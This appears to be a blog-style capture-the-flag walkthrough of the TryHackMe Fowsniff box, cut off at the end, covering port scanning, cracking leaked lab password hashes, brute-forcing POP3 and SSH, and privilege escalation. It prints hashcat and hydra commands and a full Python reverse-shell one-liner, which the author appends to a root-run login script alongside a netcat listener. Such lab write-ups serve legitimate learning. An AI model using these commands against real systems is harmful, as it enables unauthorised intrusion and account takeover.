I just started using the TryHackMe platform to learn more about cybersecurity from both the Red and Blue team. Methodology can get stale at times, so let's solve a CTF!
You can find the Box on TryHackMe.
Information Gathering
A quick scan on the top 1000 ports using my custom nmap script revealed that 4 services were running on the server. Namely SSH, HTTP, POP3, and IMAP. Let's start with the web server.
The main page mentioned their Twitter (@fowsniffcorp) being hacked. Other than that, nothing of value was to be found on the web server, even after looking for hidden directories and files using gobuster.
Looking at their Twitter, it's easy to notice it has been defaced quite badly by the attacker.
The hacked Twitter profileLucky for me, however, the attacker leaked a bunch of MD5 password hashes in the process.
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e"
I cracked these hashes locally using the rockyou.txt password database.
hashcat -m 0 -a 0 hashes.txt /usr/share/dict/rockyou.txt
The result was this password and user list:
seina@fowsniff : scoobydoo2
parede@fowsniff : orlando12
tegel@fowsniff : apples01
baksteen@fowsniff : skyler22
mauer@fowsniff : mailcall
sciana@fowsniff : 07011972
mursten@fowsniff : carp4ever
mustikka@fowsniff : bilbo101
User Access
A quick bruteforce attack on the POP3 service using the credentials I found gave me access to the mailbox of the user seina.
hydra -L users.txt -P passwords.txt pop3://10.10.192.198"I then used the very barebones telnet interface to connect to the mail server.
telnet 10.10.192.198 110
Trying 10.10.192.198...
Connected to 10.10.192.198.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
USER seina
+OK
PASS scoobydoo2
+OK Logged in.
LIST
+OK 2 messages:
1 1622
2 1280"
Once connected to the POP3 server, I found an email mentioning that a new temporary SSH password S1ck3nBluff+secureshell has been set and should be changed ASAP.
I ran another bruteforce attack, this time on SSH, and found myself inside the server as the user baksteen.
Privilege Escalation
After snooping around the system, I found a file /opt/cube/cube.sh responsible for displaying the fancy header we see on a successful SSH login. This file is particularly interesting as it is owned by the group users, which our compromised user is a member of.
> find / -group users -type f 2>/dev/null
...
-rw-rwxr-- 1 parede users 1296 Jun 30 16:56 /opt/cube/cube.sh
...
I decided to add a reverse shell to the end of it and see with what privilege it is called.
I ended up going with this Python one:
export RHOST="10.0.0.1";export RPORT=4444;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
I set up a netcat listener nc -lnvp 4444 and logged out of the shell.
On logging back in to the compromised account ...
